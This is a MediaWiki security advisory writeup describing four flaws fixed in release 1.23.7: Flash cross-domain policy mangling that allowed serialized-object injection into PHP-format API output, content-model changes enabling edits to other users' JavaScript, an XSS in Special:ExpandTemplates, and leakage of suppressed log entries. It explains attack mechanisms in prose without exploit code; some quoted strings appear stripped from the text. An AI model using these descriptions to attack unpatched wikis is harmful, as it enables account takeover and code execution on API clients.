User:CSteipp (WMF)/SecurityRelease 1.23.7

This is a brief writeup on the security flaws fixed in the 1.23.7 (and 1.22.14/1.19.22) release.

=  mangling allows injection in API format=php = Background: Adobe flash (and Microsoft Silverlight) can make calls to and access information on domains other than where the .swf file is hosted if the target domain allows access with a cross-domain policy. The policy is expressed in xml, and can either be hosted in the sites default location (domain.com/cross-domain.xml), or a pointer to the policy file can be specified in the html embedding the plugin to point to another file on the target domain (domain.com/foo/bar/mypolicy.xml). This allowed anyone to add text that looked like a cross-domain policy to a wiki page, pass an action=raw url as the policy's url, and the flash plugin would be given full access to the wiki as the logged in user.

Adobe updated the flash plugin to always check for a master policy at cross-domain.xml in the domain root, so site owners could restrict hosting other policy files on the domain. But before they did this, MediaWiki took the precaution of changing any output containing "" to "".

Issues: In addition to preventing an accurate representation of the wiki content if it happened to contain the string "" (T68776), PleaseStand recognized that because the length of the output string could change if whitespace was also removed. In php serialization (format=php in calls to the api), this could be abused to inject attacker controlled, serialized objects into the output, which could execute attacker-controlled code in api clients. This flaw has been present since the initial commit of the Flash mangling in 28dc3ec8 (MediaWiki 1.10). Although this code injection doesn't affect the server hosting the wiki, the issue was important to fix due to the number of bots using the php-format api on WMF wikis.

Fix: To prevent exploiting the specific issue, we throw an exception when the output contains  in a php formatted api call, and mangling is enabled. Mangling can also be disabled with a config flag ($wgMangleFlashPolicy=false), if site administrators have deployed a cross-domain policy at their domain's root, which prevents policies from being defined on the wiki.

= Users can change the content model of other users' user pages to CSS or JS = 
 * (bug 70901) SECURITY: User Jackmcbarn reported that the ability to update the content model for a page could allow an unprivileged attacker to edit another user's common.js under certain circumstances. The user right "editcontentmodel" was added, and is needed to change a revision's content model.

= XSS in Special:ExpandTemplates when $wgRawHtml = true = 
 * (bug 71111) SECURITY: User PleaseStand reported that on wikis that allow raw HTML, it is not safe to preview wikitext coming from an untrusted source such as a cross-site request. Thus add an edit token to the form, and when raw HTML is allowed, ensure the token is provided before showing the preview. This check is not performed on wikis that both allow raw HTML and anonymous editing, since there are easier ways to exploit that scenario.

= list=logevents in API shows type/action of suppressed and revdeleted log entries = 
 * (bug 72222) SECURITY: Do not show log action when the entry is revdeleted with DELETED_ACTION. NOTICE: this may be reverted in a future release pending a public RFC about the desired functionality. This issue was reported by user Bawolff.